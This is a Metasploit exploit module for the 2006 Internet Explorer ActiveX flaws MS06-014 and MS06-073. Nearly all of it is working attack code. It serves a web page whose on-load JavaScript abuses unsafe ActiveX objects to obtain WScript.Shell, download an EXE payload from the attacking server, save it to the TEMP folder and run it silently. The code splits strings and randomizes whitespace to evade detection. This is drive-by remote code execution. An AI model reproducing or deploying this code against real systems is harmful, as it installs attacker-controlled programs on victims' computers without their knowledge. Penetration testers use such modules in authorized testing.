##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Seh
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :ua_name    => HttpClients::IE,
    # In badly misconfigured situations, IE7 and 8 could be vulnerable to
    # this, but by default they throw an ugly popup that stops all script
    # execution until the user deals with it and aborts everything if they
    # click "no".  Not worth the risk of being unable to try more recent
    # exploits.  Make sure service packs on top of 6.0 are considered less
    # than the max by setting to 6.1 (which doesn't really exist).
    :ua_maxver  => "6.1",
    :javascript => true,
    :os_name    => OperatingSystems::Match::WINDOWS,
    :method     => [ 'CreateObject', 'GetObject' ],
    :classid    =>
      [
          '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
          '{BD96C556-65A3-11D0-983A-00C04FC29E30}',
          '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
          '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
          '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
          '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
          '{639F725F-1B2D-4831-A9FD-874847682010}',
          '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
          '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
          '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
          '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
          '{0006F033-0000-0000-C000-000000000046}',
          '{0006F03A-0000-0000-C000-000000000046}',
      ],
    #:rank => ExcellentRanking  # reliable exe writer
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',
      'Description'    => %q{
          This module exploits a generic code execution vulnerability in Internet
        Explorer by abusing vulnerable ActiveX objects.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',
        ],
      'References'     =>
        [
          # MDAC
          [ 'MSB', 'MS06-014' ],
          [ 'CVE', '2006-0003' ],
          [ 'OSVDB', '24517' ],
          # WMI Object Broker
          [ 'MSB', 'MS06-073' ],
          [ 'CVE', '2006-4704' ],
          [ 'OSVDB', '30155' ],
        ],
      'Payload'        =>
        {
          'Space'           => 2048,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],

          # Patched
          [ 'MS06-014 - RDS.DataSpace',                     { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
          # Found in mpack
          [ 'MS06-014 - RDS.DataSpace',                     { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],

          # Patched
          [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],

          # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
          [ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
          [ 'UNKNOWN  - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],

          # Visual Studio components, not marked as safe
          [ 'UNKNOWN  - VsmIDE.DTE',                        { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
          [ 'UNKNOWN  - DExplore.AppObj.8.0',               { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
          [ 'UNKNOWN  - VisualStudio.DTE.8.0',              { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
          [ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0',          { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
          [ 'UNKNOWN  - VsaIDE.DTE',                        { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],

          #
          # The controls below can launch the "installing component" dialogs...
          #

          # Not marked as safe
          [ 'UNKNOWN  - Business Object Factory ',          { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],

          # Not marked as safe
          [ 'UNKNOWN  - Outlook Data Object',               { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],

          # Found exploitable in the wild (no details)
          [ 'UNKNOWN  - Outlook.Application',               { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],

        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 11 2006'))
  end

  def on_request_uri(cli, request)

    if (request.uri.match(/payload/))
      return if ((p = regenerate_payload(cli)) == nil)
      data = generate_payload_exe({ :code => p.encoded })
      print_status("Sending EXE payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Build out the HTML response page
    var_html           = rand_text_alpha(rand(30)+2)
    var_func_exploit   = rand_text_alpha(rand(30)+2);
    var_func_go        = rand_text_alpha(rand(30)+2);
    var_func_createo   = rand_text_alpha(rand(30)+2);
    var_exe_name       = rand_text_alpha(rand(30)+2);
    var_objects = ''

    # Build the object list based on target selection
    if (target.name == 'Automatic')
      targets.each do |t|
        next if not t['CLSID']
        var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
      end
    else
      var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
    end


    content = %Q^
<html><head><title></title>
<script language="javascript">

function #{var_func_createo}( o , n ) {
  var r = null;

  try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}

  if (! r) {
    try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
  }

  return( r );
}

function #{var_func_go}( a ) {

  var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );

  var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );

  var e = s.Environment( "P" + "ro" + "ce" + "ss" );


  var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
  var xml = null;
  var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
  var dat;

  try { xml=new XMLHttpRequest(); }
  catch(e) {
    try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch(e) {
      xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
    }
  }

  if (! xml) {
    return(0);
  }

  xml.open("GET", url, false);
  xml.send(null);
  dat = xml.responseBody;

  o.Type = 1 ;
  o.Mode = 3 ;
  o.Open ( ) ;
  o.Write ( dat ) ;
  o.SaveToFile ( bin, 2) ;

  s.Run ( bin , 0 );
}

function #{var_func_exploit}( ) {
  var i = 0;
  var t = new Array( #{var_objects} null );

  while (t[i]) {
    var a = null;

    if (t[i].substring(0,1) == '{') {
      a = document.createElement("object");
      a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
    } else {
      try { a = new ActiveXObject(t[i]); } catch(e){}
    }

    if (a) {
      try {
        var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
        if (b) {
          #{var_func_go}( a ) ;
          return(0) ;
        }
      } catch(e){
      }
    }
    i++;
  }
}
</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>

^


    content = Rex::Text.randomize_space(content)

    print_status("Sending exploit HTML...")


    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end

end
